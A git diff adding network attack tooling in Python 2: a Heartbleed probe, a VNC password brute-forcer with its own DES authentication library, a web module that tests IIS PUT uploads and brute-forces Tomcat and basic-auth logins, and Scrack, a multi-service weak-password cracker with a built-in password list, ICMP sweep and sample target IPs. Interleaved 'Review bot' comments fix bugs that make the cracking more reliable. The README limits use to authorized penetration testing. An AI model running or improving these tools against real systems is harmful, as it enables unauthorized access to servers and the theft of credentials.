+ if not data: + return None + rdata += data + remain -= len(data) + return rdata + + def recvmsg(self,s): + hdr = self.recvall(s, 5) + if hdr is None: + return None, None, None + typ, ver, ln = struct.unpack('>BHH', hdr) + pay = self.recvall(s, ln, 10) + return typ, ver, pay + + + def hit_hb(self,s,ip,port): + s.send(self.hb) + while True: + typ, ver, pay = self.recvmsg(s) + if typ is None: + return False + + if typ == 24: + if len(pay) > 3: + self.lock.acquire() + printRed('WARNING: %s ssl at %s returned more data than it should - server is vulnerable!\r\n' %(ip,port)) + self.result.append('WARNING: %s ssl at %s returned more data than it should - server is vulnerable!\r\n' %(ip,port)) + self.lock.release() + else: + self.lock.acquire() + printRed('%s ssl at %s processed malformed heartbeat, but did not return any extra data.\r\n' %(ip,port)) + self.result.append('%s ssl at %s processed malformed heartbeat, but did not return any extra data.\r\n' %(ip,port)) + self.lock.release() + return True + + if typ == 21: + return False + + def openssl_test(self,ip,port): + try: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sys.stdout.flush() + s.connect((ip, port)) + sys.stdout.flush() + s.send(self.hello) + sys.stdout.flush() + while True: + typ, ver, pay = self.recvmsg(s) + if typ == None: + break + # Look for server hello done message. 
+ if typ == 22 and ord(pay[0]) == 0x0E: + break + sys.stdout.flush() + s.send(self.hb) + self.hit_hb(s,ip,port) + except Exception,e: + #print e + pass + + + def run(self,ipdict,pinglist,threads,file): + if len(ipdict['ssl']): + printPink("crack ssl now...") + print "[*] start test openssl_heart %s" % time.ctime() + starttime=time.time() + + pool=Pool(threads) + for ip in ipdict['ssl']: + pool.apply_async(func=self.openssl_test,args=(str(ip).split(':')[0],int(str(ip).split(':')[1]))) + pool.close() + pool.join() + + print "[*] stop ssl serice %s" % time.ctime() + print "[*] crack ssl done,it has Elapsed time:%s " % (time.time()-starttime) + + for i in xrange(len(self.result)): + self.config.write_file(contents=self.result[i],file=file) + +if __name__ == '__main__': + import sys + sys.path.append("../") + from comm.config import * + c=config() + ipdict={'ssl': ['222.22.224.142:443']} + pinglist=['122.225.81.129'] + test=ssl_burp(c) + test.run(ipdict,pinglist,50,file="../result/test") diff --git a/Bruteforce/plugins/ssltest.pyc b/Bruteforce/plugins/ssltest.pyc new file mode 100644 index 0000000..00cfc1c Binary files /dev/null and b/Bruteforce/plugins/ssltest.pyc differ diff --git a/Bruteforce/plugins/tomcat.pyc b/Bruteforce/plugins/tomcat.pyc new file mode 100644 index 0000000..f78b1bd Binary files /dev/null and b/Bruteforce/plugins/tomcat.pyc differ diff --git a/Bruteforce/plugins/vnc.py b/Bruteforce/plugins/vnc.py new file mode 100644 index 0000000..72fefee --- /dev/null +++ b/Bruteforce/plugins/vnc.py 
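Review bot: `hit_hb` calls `len(pay)` for a type-24 record, but `recvmsg` returns `pay = None` whenever the payload read in `recvall` times out, so that path raises `TypeError` inside the worker and the `except Exception` in `openssl_test` silently drops it — the host is then reported neither as vulnerable nor as clean. Guard it with `if typ == 24 and pay is not None:`, and the `ord(pay[0])` in `openssl_test` likewise needs `pay` to be non-empty before indexing. The socket created in `openssl_test` is never closed on any path; since the pool opens one per target, wrap the body so that `finally: s.close()` always runs. The interleaved `sys.stdout.flush()` calls serve no purpose here and can be removed.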
@@ -0,0 +1,74 @@ +from printers import printPink,printGreen +import time +import threading +from multiprocessing.dummy import Pool +from vnclib import * + + +class vnc_burp(object): + + + def __init__(self,c): + self.config=c + self.lock=threading.Lock() + self.result=[] + self.lines=self.config.file2list("conf/vnc.conf") + + def vnc_connect(self,ip,port,password): + crack =0 + try: + v = VNC() + v.connect(ip, port, 10) + code,mesg=v.login(password) + if mesg=='OK': + crack=1 + except Exception,e: + crack=2 + pass + return crack + + def vnc_l(self,ip,port): + try: + for data in self.lines: + flag=self.vnc_connect(ip=ip,port=port,password=data) + if flag==2: + self.lock.acquire() + print "%s vnc at %s not allow connect now because of too many security failure" %(ip,port) + self.lock.release() + break + + if flag==1: + self.lock.acquire() + printGreen("%s vnc at %s has weaken password!!-----%s\r\n" %(ip,port,data)) + self.result.append("%s vnc at %s has weaken password!!-----%s\r\n" %(ip,port,data)) + self.lock.release() + break + else: + self.lock.acquire() + print "login %s vnc service with %s fail " %(ip,data) + self.lock.release() + except Exception,e: + pass + + def run(self,ipdict,pinglist,threads,file): + if len(ipdict['vnc']): + printPink("crack vnc now...") + print "[*] start crack vnc %s" % time.ctime() + starttime=time.time() + + pool=Pool(threads) + + for ip in ipdict['vnc']: + pool.apply_async(func=self.vnc_l,args=(str(ip).split(':')[0],int(str(ip).split(':')[1]))) + + pool.close() + pool.join() + + print "[*] stop vnc serice %s" % time.ctime() + print "[*] crack vnc done,it has Elapsed time:%s " % (time.time()-starttime) + + for i in xrange(len(self.result)): + self.config.write_file(contents=self.result[i],file=file) + + + diff --git a/Bruteforce/plugins/vnc.pyc b/Bruteforce/plugins/vnc.pyc new file mode 100644 index 0000000..3fbd2ad Binary files /dev/null and b/Bruteforce/plugins/vnc.pyc differ 
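Review bot: `vnc_connect` maps every exception to `crack=2`, and `vnc_l` then logs `not allow connect now because of too many security failure` and stops — but a refused connection, a timeout and a `VNC_Error` from `vnclib` all land in that branch, so the message is wrong in most cases and hides the real cause. Catch `VNC_Error` separately from `socket.error`/`Exception` and include `str(e)` in the log line so an operator can tell a protocol error from a lockout; the `pass` after `crack=2` is dead and should go. `from vnclib import *` is also better written as `from vnclib import VNC, VNC_Error` so the dependency on the helper module is explicit.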
diff --git a/Bruteforce/plugins/vnclib.py b/Bruteforce/plugins/vnclib.py new file mode 100644 index 0000000..eaf6470 --- /dev/null +++ b/Bruteforce/plugins/vnclib.py 
@@ -0,0 +1,97 @@ +__author__ = 'wilson' +from Crypto.Cipher import DES +from sys import version_info +import time + +class VNC_Error(Exception): + pass +class VNC: + def connect(self, host, port, timeout): + self.fp = socket.create_connection((host, port), timeout=timeout) + resp = self.fp.recv(99) # banner + + self.version = resp[:11].decode('ascii') + + if len(resp) > 12: + raise VNC_Error('%s %s' % (self.version, resp[12:].decode('ascii', 'ignore'))) + + return self.version + + def login(self, password): + major, minor = self.version[6], self.version[10] + + if (major, minor) in [('3', '8'), ('4', '1')]: + proto = b'RFB 003.008\n' + + elif (major, minor) == ('3', '7'): + proto = b'RFB 003.007\n' + + else: + proto = b'RFB 003.003\n' + + self.fp.sendall(proto) + + time.sleep(0.5) + + resp = self.fp.recv(99) + + + if minor in ('7', '8'): + code = ord(resp[0:1]) + if code == 0: + raise VNC_Error('Session setup failed: %s' % resp.decode('ascii', 'ignore')) + + self.fp.sendall(b'\x02') # always use classic VNC authentication + resp = self.fp.recv(99) + + else: # minor == '3': + code = ord(resp[3:4]) + if code != 2: + raise VNC_Error('Session setup failed: %s' % resp.decode('ascii', 'ignore')) + + resp = resp[-16:] + + if len(resp) != 16: + raise VNC_Error('Unexpected challenge size (No authentication required? 
Unsupported authentication type?)') + + + pw = password.ljust(8, '\x00')[:8] # make sure it is 8 chars long, zero padded + + key = self.gen_key(pw) + + + des = DES.new(key, DES.MODE_ECB) + enc = des.encrypt(resp) + + + self.fp.sendall(enc) + + resp = self.fp.recv(99) + + self.fp.close() + code = ord(resp[3:4]) + mesg = resp[8:].decode('ascii', 'ignore') + + if code == 1: + return code, mesg or 'Authentication failure' + + elif code == 0: + return code, mesg or 'OK' + + else: + raise VNC_Error('Unknown response: %s (code: %s)' % (repr(resp), code)) + + def gen_key(self, key): + newkey = [] + for ki in range(len(key)): + bsrc = ord(key[ki]) + btgt = 0 + for i in range(8): + if bsrc & (1 << i): + btgt = btgt | (1 << 7-i) + newkey.append(btgt) + + if version_info[0] == 2: + return ''.join(chr(c) for c in newkey) + else: + return bytes(newkey) diff --git a/Bruteforce/plugins/vnclib.pyc b/Bruteforce/plugins/vnclib.pyc new file mode 100644 index 0000000..6b34151 Binary files /dev/null and b/Bruteforce/plugins/vnclib.pyc differ diff --git a/Bruteforce/plugins/web.py b/Bruteforce/plugins/web.py new file mode 100644 index 0000000..efa49c8 --- /dev/null +++ b/Bruteforce/plugins/web.py 
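Review bot: `VNC.connect` calls `socket.create_connection(...)`, but this module never imports `socket` (only `DES`, `version_info` and `time`), so every call raises `NameError`; because `vnc.py` wraps the call in `except Exception`, the failure only surfaces as the misleading "too many security failure" message. Add `import socket` to the import block. `login` closes `self.fp` only on the success path — any `VNC_Error` raised earlier leaves the connection open — so the close belongs in a `finally:` in `login` or in a `close()` method the caller invokes. `ord(resp[0:1])` and `ord(resp[3:4])` also raise `TypeError` on a short or empty `resp` rather than a `VNC_Error`; a length check before indexing, e.g. `if len(resp) < 4: raise VNC_Error('Short response: %r' % resp)`, keeps the error path consistent.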
@@ -0,0 +1,119 @@ +#coding=utf-8 +import threading +from printers import printPink,printRed,printGreen +from multiprocessing.dummy import Pool +import requests +import socket +import httplib +import time +import urlparse +import urllib2 +import re +import base64 + + +class web_burp(object): + + def __init__(self,c): + self.config=c + self.lock=threading.Lock() + self.result=[] + self.tomcatlines=self.config.file2list("conf/tomcat.conf") + self.weblines=self.config.file2list("conf/web.conf") + + def weblogin(self,url,ip,port,username,password): + try: + creak=0 + header={} + login_pass=username+':'+password + header['Authorization']='Basic '+base64.encodestring(login_pass) + #header base64.encodestring 会多加一个回车号 + header['Authorization']=header['Authorization'].replace("\n","") + r=requests.get(url,headers=header,timeout=8) + if r.status_code==200: + self.result.append("%s service at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password)) + self.lock.acquire() + printGreen("%s service at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password)) + self.lock.release() + creak=1 + else: + self.lock.acquire() + print "%s service 's %s:%s login fail " %(ip,username,password) + self.lock.release() + except Exception,e: + pass + return creak + + + def webmain(self,ip,port): + #iis_put vlun scann + try: + url='http://'+ip+':'+str(port)+'/'+str(time.time())+'.txt' + r = requests.put(url,data='hi~',timeout=10) + if r.status_code==201: + self.lock.acquire() + printGreen('%s has iis_put vlun at %s\r\n' %(ip,port)) + self.lock.release() + self.result.append('%s has iis_put vlun at %s\r\n' %(ip,port)) + except Exception,e: + #print e + pass + + #burp 401 web + try: + url='http://'+ip+':'+str(port) + url_get=url+'/manager/html' + r=requests.get(url_get,timeout=8)#tomcat + r2=requests.get(url,timeout=8)#web + + if r.status_code==401: + for data in self.tomcatlines: + username=data.split(':')[0] + password=data.split(':')[1] + 
flag=self.weblogin(url_get,ip,port,username,password) + if flag==1: + break + + elif r2.status_code==401: + for data in self.weblines: + username=data.split(':')[0] + password=data.split(':')[1] + flag=self.weblogin(url,ip,port,username,password) + if flag==1: + break + else: + pass + + except Exception,e: + pass + + + def run(self,ipdict,pinglist,threads,file): + if len(ipdict['http']): + print "[*] start test web burp at %s" % time.ctime() + starttime=time.time() + + pool=Pool(threads) + + for ip in ipdict['http']: + pool.apply_async(func=self.webmain,args=(str(ip).split(':')[0],int(str(ip).split(':')[1]))) + pool.close() + pool.join() + + print "[*] stop test iip_put&&scanner web paths at %s" % time.ctime() + print "[*] test iip_put&&scanner web paths done,it has Elapsed time:%s " % (time.time()-starttime) + + for i in xrange(len(self.result)): + self.config.write_file(contents=self.result[i],file=file) + + +if __name__ == '__main__': + import sys + sys.path.append("../") + from comm.config import * + c=config() + ipdict={'http': ['192.168.1.1:80']} + pinglist=['192.168.1.1'] + test=web_burp(c) + test.run(ipdict,pinglist,50,file="../result/test") + diff --git a/Bruteforce/plugins/web.pyc b/Bruteforce/plugins/web.pyc new file mode 100644 index 0000000..70967e9 Binary files /dev/null and b/Bruteforce/plugins/web.pyc differ diff --git a/Bruteforce/requirements.txt b/Bruteforce/requirements.txt new file mode 100644 index 0000000..31aa2df --- /dev/null +++ b/Bruteforce/requirements.txt @@ -0,0 +1,12 @@ +MySQL-python 1.2.4 +pymssql 2.1.1 +impacket +requests +pysnmp 4.2.5 +pycrypto 2.6.1 +paramiko 1.1.5 +python-ldap 2.4.13 +pymongo 2.4 +psycopg2 +redis +IPy diff --git a/Bruteforce/result/.DS_Store b/Bruteforce/result/.DS_Store new file mode 100644 index 0000000..5008ddf Binary files /dev/null and b/Bruteforce/result/.DS_Store differ diff --git a/Scrack/README.md b/Scrack/README.md new file mode 100644 index 0000000..4c434dd --- /dev/null +++ b/Scrack/README.md 
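Review bot: In `weblogin` the `self.result.append(...)` on success happens before `self.lock.acquire()`, unlike every other plugin in this commit where the append sits inside the locked region; move it under the lock (preferably `with self.lock:`) so the result list and console output are updated consistently. `httplib`, `urlparse`, `urllib2`, `re` and `socket` are imported but never used and should be dropped. The `else: pass` at the end of `webmain` is dead code. `weblogin` returns `creak`, which is first assigned inside the `try`; initialise `creak = 0` before the `try` so the return is always bound regardless of what raises.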
@@ -0,0 +1,24 @@ +# Scrack(服务弱口令检测脚本) + +1. 功能 + 一款python编写的轻量级弱口令检测脚本,目前支持以下服务:FTP、MYSQL、MSSQL、MONGODB、REDIS、TELNET、ELASTICSEARCH、POSTGRESQL。 +2. 特点 + 命令行、单文件,绿色方便各种情况下的使用。 + 无需任何外库以及外部程序支持,所有协议均采用socket与内置库进行检测。 + 兼容OSX、LINUX、WINDOWS,Python 2.6+(更低版本请自行测试,理论上均可运行)。 +3. 参数说明 + python Scrack.py -h 192.168.1 [-p 21,80,3306] [-m 50] [-t 10] + -h 必须输入的参数,支持ip(192.168.1.1),ip段(192.168.1),ip范围指定(192.168.1.1-192.168.1.254),ip列表文件(ip.ini),最多限制一次可扫描65535个IP。 + -p 指定要扫描端口列表,多个端口使用,隔开 例如:1433,3306,5432。未指定即使用内置默认端口进行扫描(21,23,1433,3306,5432,6379,9200,11211,27017) + -m 指定线程数量 默认100线程 + -t 指定请求超时时间。 + -d 指定密码字典。 + -n 不进行存活探测(ICMP)直接进行扫描。 +4. 使用例子 + python Scrack.py -h 10.111.1 + python Scrack.py -h 192.168.1.1 -d pass.txt + python Scrack.py -h 10.111.1.1-10.111.2.254 -p 3306,5432 -m 200 -t 6 + python Scrack.py.py -h ip.ini -n +5. 法律声明 + 此脚本仅可用于授权的渗透测试以及自身的安全检测中。 + 此脚本仅用于学习以及使用,可自由进行改进,禁止提取加入任何有商业行为的产品中。 diff --git a/Scrack/Scrack.py b/Scrack/Scrack.py new file mode 100644 index 0000000..a70152c --- /dev/null +++ b/Scrack/Scrack.py 
@@ -0,0 +1,521 @@ +#coding:utf-8 + +import getopt +import sys +import Queue +import threading +import socket +import urllib2 +import time +import os +import re +import ftplib +import hashlib +import struct +import binascii +import telnetlib +import array + +queue = Queue.Queue() +mutex = threading.Lock() +TIMEOUT = 10 +I = 0 +USER_DIC = { + "ftp":['www','admin','root','db','wwwroot','data','web','ftp'], + "mysql":['root'], + "mssql":['sa'], + "telnet":['administrator','admin','root','cisco'], + "postgresql":['postgres','admin'], + "redis":['null'], + "mongodb":['null'], + "memcached":['null'], + "elasticsearch":['null'] +} +PASSWORD_DIC = ['123456','admin','root','password','123123','123','1','{user}','{user}{user}','{user}1','{user}123','{user}2016','{user}2015','{user}!','','P@ssw0rd!!','qwa123','12345678','test','123qwe!@#','123456789','123321','1314520','666666','woaini','fuckyou','000000','1234567890','8888888','qwerty','1qaz2wsx','abc123','abc123456','1q2w3e4r','123qwe','159357','p@ssw0rd','p@55w0rd','password!','p@ssw0rd!','password1','r00t','tomcat','apache','system'] +REGEX = [['ftp', '21', '^220.*?ftp|^220-|^220 Service|^220 FileZilla'], ['telnet', '23', '^\\xff[\\xfa-\\xfe]|^\\x54\\x65\\x6c|Telnet'],['mssql', '1433', ''], ['mysql', '3306', '^.\\0\\0\\0.*?mysql|^.\\0\\0\\0\\n|.*?MariaDB server'], ['postgresql', '5432', ''], ['redis', '6379', '-ERR|^\\$\\d+\\r\\nredis_version'], ['elasticsearch', '9200', ''], ['memcached', '11211', '^ERROR'], ['mongodb', '27017', '']] +class Crack(): + def __init__(self,ip,port,server,timeout): + self.ip = ip + self.port = port + self.server = server + self.timeout = timeout + def run(self): + user_list = USER_DIC[self.server] + #print user_list + for user in user_list: + for pass_ in PASSWORD_DIC: + pass_ = str(pass_.replace('{user}', user)) + k = getattr(self,self.server) + result = k(user,pass_) + if result:return result + def ftp(self,user,pass_): + try: + ftp=ftplib.FTP() + ftp.connect(self.ip,self.port) + 
ftp.login(user,pass_) + if user == 'ftp':return "anonymous" + return "username:%s,password:%s"%(user,pass_) + except Exception,e: + pass + def mysql(self,user,pass_): + sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM) + sock.connect((self.ip,int(self.port))) + packet = sock.recv(254) + plugin,scramble = self.get_scramble(packet) + if not scramble:return 3 + auth_data = self.get_auth_data(user,pass_,scramble,plugin) + sock.send(auth_data) + result = sock.recv(1024) + if result == "\x07\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00": + return "username:%s,password:%s" % (user,pass_) + def postgresql(self,user,pass_):#author:hos@YSRC + try: + sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM) + sock.connect((self.ip,int(self.port))) + packet_length = len(user) + 7 +len("\x03user database postgres application_name psql client_encoding UTF8 ") + p="%c%c%c%c%c\x03%c%cuser%c%s%cdatabase%cpostgres%capplication_name%cpsql%cclient_encoding%cUTF8%c%c"%( 0,0,0,packet_length,0,0,0,0,user,0,0,0,0,0,0,0,0) + sock.send(p) + packet = sock.recv(1024) + psql_salt=[] + if packet[0]=='R': + a=str([packet[4]]) + b=int(a[4:6],16) + authentication_type=str([packet[8]]) + c=int(authentication_type[4:6],16) + if c==5:psql_salt=packet[9:] + else:return 3 + buf=[] + salt = psql_salt + lmd5= self.make_response(buf,user,pass_,salt) + packet_length1=len(lmd5)+5+len('p') + pp='p%c%c%c%c%s%c'%(0,0,0,packet_length1 - 1,lmd5,0) + sock.send(pp) + packet1 = sock.recv(1024) + if packet1[0] == "R": + return "username:%s,password:%s" % (user,pass_) + except Exception,e: + return 3 + def redis(self,user,pass_): + try: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((self.ip,int(self.port))) + s.send("INFO\r\n") + result = s.recv(1024) + if "redis_version" in result: + return "unauthorized" + elif "Authentication" in result: + for pass_ in PASSWORD_DIC: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((self.ip,int(self.port))) + s.send("AUTH %s\r\n"%(pass_)) + 
result = s.recv(1024) + if '+OK' in result: + return "username:%s,password:%s" % (user,pass_) + except Exception,e: + return 3 + def mssql(self,user,pass_):#author:hos@YSRC + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.connect((self.ip,self.port)) + hh=binascii.b2a_hex(self.ip) + husername=binascii.b2a_hex(user) + lusername=len(user) + lpassword=len(pass_) + ladd=len(self.ip)+len(str(self.port))+1 + hladd=hex(ladd).replace('0x','') + hpwd=binascii.b2a_hex(pass_) + pp=binascii.b2a_hex(str(self.port)) + address=hh+'3a'+pp + hhost= binascii.b2a_hex(self.ip) + data="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" + data1=data.replace(data[16:16+len(address)],address) + data2=data1.replace(data1[78:78+len(husername)],husername) + data3=data2.replace(data2[140:140+len(hpwd)],hpwd) + if lusername>=16: + data4=data3.replace('0X',str(hex(lusername)).replace('0x','')) + else: + data4=data3.replace('X',str(hex(lusername)).replace('0x','')) + if lpassword>=16: + data5=data4.replace('0Y',str(hex(lpassword)).replace('0x','')) + else: + data5=data4.replace('Y',str(hex(lpassword)).replace('0x','')) + hladd = hex(ladd).replace('0x', '') + data6=data5.replace('ZZ',str(hladd)) + data7=binascii.a2b_hex(data6) + sock.send(data7) + packet=sock.recv(1024) + if 'master' in packet: + return "username:%s,password:%s" % (user,pass_) + except: + return 3 + def mongodb(self,user,pass_): + try: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((self.ip,int(self.port))) + data = binascii.a2b_hex("3a000000a741000000000000d40700000000000061646d696e2e24636d640000000000ffffffff130000001069736d6173746572000100000000") + s.send(data) + result = s.recv(1024) + if "ismaster" in result: + getlog_data = binascii.a2b_hex("480000000200000000000000d40700000000000061646d696e2e24636d6400000000000100000021000000026765744c6f670010000000737461727475705761726e696e67730000") + s.send(getlog_data) + result = s.recv(1024) + if "totalLinesWritten" in result: + return 
"unauthorized" + else:return 3 + except Exception,e: + return 3 + def memcached(self,user,pass_): + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((self.ip,int(self.port))) + s.send("stats\r\n") + result = s.recv(1024) + if "version" in result: + return "unauthorized" + def elasticsearch(self,user,pass_): + url = "http://"+self.ip+":"+str(self.port)+"/_cat" + data = urllib2.urlopen(url).read() + if '/_cat/master' in data: + return "unauthorized" + else: + return 3 + def telnet(self,user,pass_): + try: + tn = telnetlib.Telnet(self.ip,self.port,self.timeout) + #tn.set_debuglevel(3) + time.sleep(0.5) + os = tn.read_some() + except Exception ,e: + return 3 + user_match="(?i)(login|user|username)" + pass_match='(?i)(password|pass)' + login_match='#|\$|>' + if re.search(user_match,os): + try: + tn.write(str(user)+'\r\n') + tn.read_until(pass_match,timeout=2) + tn.write(str(pass_)+'\r\n') + login_info=tn.read_until(login_match,timeout=3) + tn.close() + if re.search(login_match,login_info): + return "username:%s,password:%s" % (user,pass_) + except Exception,e: + pass + else: + try: + info=tn.read_until(user_match,timeout=2) + except Exception,e: + return 3 + if re.search(user_match,info): + try: + tn.write(str(user)+'\r\n') + tn.read_until(pass_match,timeout=2) + tn.write(str(pass_)+'\r\n') + login_info=tn.read_until(login_match,timeout=3) + tn.close() + if re.search(login_match,login_info): + return "username:%s,password:%s" % (user,pass_) + except Exception,e: + return 3 + elif re.search(pass_match,info): + tn.read_until(pass_match,timeout=2) + tn.write(str(pass_)+'\r\n') + login_info=tn.read_until(login_match,timeout=3) + tn.close() + if re.search(login_match,login_info): + return "password:%s" % (pass_) + def get_hash(self,password, scramble): + hash_stage1 = hashlib.sha1(password).digest() + hash_stage2 = hashlib.sha1(hash_stage1).digest() + to = hashlib.sha1(scramble+hash_stage2).digest() + reply = [ord(h1) ^ ord(h3) for (h1, h3) in 
zip(hash_stage1, to)] + hash = struct.pack('20B', *reply) + return hash + def get_scramble(self,packet): + scramble,plugin = '','' + try: + tmp = packet[15:] + m = re.findall("\x00?([\x01-\x7F]{7,})\x00", tmp) + if len(m)>3:del m[0] + scramble = m[0] + m[1] + except: + return '','' + try: + plugin = m[2] + except: + pass + return plugin,scramble + def get_auth_data(self,user,password,scramble,plugin): + user_hex = binascii.b2a_hex(user) + pass_hex = binascii.b2a_hex(self.get_hash(password,scramble)) + data = "85a23f0000000040080000000000000000000000000000000000000000000000" + user_hex + "0014" + pass_hex + if plugin:data+=binascii.b2a_hex(plugin)+ "0055035f6f73076f737831302e380c5f636c69656e745f6e616d65086c69626d7973716c045f7069640539323330360f5f636c69656e745f76657273696f6e06352e362e3231095f706c6174666f726d067838365f3634" + len_hex = hex(len(data)/2).replace("0x","") + auth_data = len_hex + "000001" +data + return binascii.a2b_hex(auth_data) + def make_response(self,buf,username,password,salt): + pu=hashlib.md5(password+username).hexdigest() + buf=hashlib.md5(pu+salt).hexdigest() + return 'md5'+buf +class SendPingThr(threading.Thread): + def __init__(self, ipPool, icmpPacket, icmpSocket, timeout=3): + threading.Thread.__init__(self) + self.Sock = icmpSocket + self.ipPool = ipPool + self.packet = icmpPacket + self.timeout = timeout + self.Sock.settimeout(timeout + 1) + def run(self): + time.sleep(0.01) + for ip in self.ipPool: + try: + self.Sock.sendto(self.packet, (ip, 0)) + except socket.timeout: + break + time.sleep(self.timeout) + +class Nscan: + def __init__(self, timeout=3): + self.timeout = timeout + self.__data = struct.pack('d', time.time()) + self.__id = os.getpid() + if self.__id >= 65535:self.__id = 65534 + @property + def __icmpSocket(self): + Sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.getprotobyname("icmp")) + return Sock + + def __inCksum(self, packet): + if len(packet) & 1: + packet = packet + '\0' + words = array.array('h', packet) 
+ sum = 0
+ for word in words:
+ sum += (word & 0xffff)
+ sum = (sum >> 16) + (sum & 0xffff)
+ sum = sum + (sum >> 16)
+ return (~sum) & 0xffff
+
+ @property
+ def __icmpPacket(self):
+ header = struct.pack('bbHHh', 8, 0, 0, self.__id, 0)
+ packet = header + self.__data
+ chkSum = self.__inCksum(packet)
+ header = struct.pack('bbHHh', 8, 0, chkSum, self.__id, 0)
+ return header + self.__data
+
+ def mPing(self, ipPool):
+ Sock = self.__icmpSocket
+ Sock.settimeout(self.timeout)
+ packet = self.__icmpPacket
+ recvFroms = set()
+ sendThr = SendPingThr(ipPool, packet, Sock, self.timeout)
+ sendThr.start()
+ while True:
+ try:
+ ac_ip = Sock.recvfrom(1024)[1][0]
+ if ac_ip not in recvFroms:
+ log("active",ac_ip,0,None)
+ recvFroms.add(ac_ip)
+ except Exception:
+ pass
+ finally:
+ if not sendThr.isAlive():
+ break
+ return recvFroms & ipPool
+def get_ac_ip(ip_list):
+ try:
+ s = Nscan()
+ ipPool = set(ip_list)
+ return s.mPing(ipPool)
+ except Exception,e:
+ print 'The current user permissions unable to send icmp packets'
+ return ip_list
+class ThreadNum(threading.Thread):
+ def __init__(self,queue):
+ threading.Thread.__init__(self)
+ self.queue = queue
+ def run(self):
+ while True:
+ try:
+ if queue.empty():break
+ queue_task = self.queue.get()
+ except:
+ break
+ try:
+ task_type,task_host,task_port = queue_task.split(":")
+ if task_type == 'portscan':
+ data = scan_port(task_host,task_port)
+ if data:
+ server_name = server_discern(task_host,task_port,data)
+ if server_name:
+ log('discern',task_host,task_port,server_name)
+ queue.put(":".join([server_name,task_host,task_port]))
+ else:
+ result = pass_crack(task_type,task_host,task_port)
+ if result and result !=3:log(task_type,task_host,task_port,result)
+ except Exception,e:
+ continue
+def scan_port(host,port):
+ try:
+ sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ sock.connect((str(host),int(port)))
+ log('portscan',host,port)
+ except Exception,e:
+ return False
+ try:
+ data = sock.recv(512)
+ if len(data) > 2:
+ return data
+ else:
+ sock.send('a\n\n')
+ data = sock.recv(512)
+ sock.close()
+ if len(data) > 2:
+ return data
+ else:
+ return 'NULL'
+ except Exception,e:
+ sock.close()
+ return 'NULL'
+def log(scan_type,host,port,info=''):
+ mutex.acquire()
+ time_str = time.strftime('%X', time.localtime( time.time()))
+ if scan_type == 'portscan':
+ print "[%s] %s:%d open"%(time_str,host,int(port))
+ elif scan_type == 'discern':
+ print "[%s] %s:%d is %s"%(time_str,host,int(port),info)
+ elif scan_type == 'active':
+ print "[%s] %s active" % (time_str, host)
+ elif info:
+ log = "[*%s] %s:%d %s %s"%(time_str,host,int(port),scan_type,info)
+ print log
+ log_file = open('result.log','a')
+ log_file.write(log+"\r\n")
+ log_file.close()
+ mutex.release()
+def server_discern(host,port,data):
+ for mark_info in REGEX:
+ try:
+ name,default_port,reg = mark_info
+ if reg and data <> 'NULL':
+ matchObj = re.search(reg,data,re.I|re.M)
+ if matchObj:
+ return name
+ elif int(default_port) == int(port):
+ return name
+ except Exception,e:
+ #print e
+ continue
+def pass_crack(server_type,host,port):
+ m = Crack(host,port,server_type,TIMEOUT)
+ return m.run()
+def get_password_dic(path):
+ pass_list = []
+ try:
+ file_ = open(path,'r')
+ for password in file_:
+ pass_list.append(password.strip())
+ file_.close()
+ return pass_list
+ except:
+ return 'read dic error'
+def get_ip_list(ip):
+ ip_list = []
+ iptonum = lambda x:sum([256**j*int(i) for j,i in enumerate(x.split('.')[::-1])])
+ numtoip = lambda x: '.'.join([str(x/(256**i)%256) for i in range(3,-1,-1)])
+ if '-' in ip:
+ ip_range = ip.split('-')
+ ip_start = long(iptonum(ip_range[0]))
+ ip_end = long(iptonum(ip_range[1]))
+ ip_count = ip_end - ip_start
+ if ip_count >= 0 and ip_count <= 65536:
+ for ip_num in range(ip_start,ip_end+1):
+ ip_list.append(numtoip(ip_num))
+ else:
+ print '-h wrong format'
+ elif '.ini' in ip:
+ ip_config = open(ip,'r')
+ for ip in ip_config:
+ ip_list.extend(get_ip_list(ip.strip()))
+ ip_config.close()
+ else:
+ ip_split=ip.split('.')
+ net = len(ip_split)
+ if net == 2:
+ for b in range(1,255):
+ for c in range(1,255):
+ ip = "%s.%s.%d.%d"%(ip_split[0],ip_split[1],b,c)
+ ip_list.append(ip)
+ elif net == 3:
+ for c in range(1,255):
+ ip = "%s.%s.%s.%d"%(ip_split[0],ip_split[1],ip_split[2],c)
+ ip_list.append(ip)
+ elif net ==4:
+ ip_list.append(ip)
+ else:
+ print "-h wrong format"
+ return ip_list
+def t_join(m_count):
+ tmp_count = 0
+ i = 0
+ if I < m_count:
+ count = len(ip_list) + 1
+ else:
+ count = m_count
+ while True:
+ time.sleep(4)
+ ac_count = threading.activeCount()
+ #print ac_count,count
+ if ac_count < count and ac_count == tmp_count:
+ i+=1
+ else:
+ i=0
+ tmp_count = ac_count
+ #print ac_count,queue.qsize()
+ if (queue.empty() and threading.activeCount() <= 1) or i > 5:
+ break
+def put_queue(ip_list,port_list):
+ for ip in ip_list:
+ for port in port_list:
+ queue.put(":".join(['portscan',ip,port]))
+if __name__=="__main__":
+ msg = '''
+Usage: python Scrack.py -h 192.168.1 [-p 21,80,3306] [-m 50] [-t 10] [-d pass.txt] [-n]
+ '''
+ if len(sys.argv) < 2:
+ print msg
+ try:
+ options,args = getopt.getopt(sys.argv[1:],"h:p:m:t:d:n")
+ ip = ''
+ port = '21,23,1433,3306,5432,6379,9200,11211,27017'
+ m_count = 100
+ ping = True
+ for opt,arg in options:
+ if opt == '-h':
+ ip = arg
+ elif opt == '-p':
+ port = arg
+ elif opt == '-m':
+ m_count = int(arg)
+ elif opt == '-t':
+ TIMEOUT = int(arg)
+ elif opt == '-n':
+ ping = False
+ elif opt == '-d':
+ PASSWORD_DIC = get_password_dic(arg)
+ socket.setdefaulttimeout(TIMEOUT)
+ if ip:
+ ip_list = get_ip_list(ip)
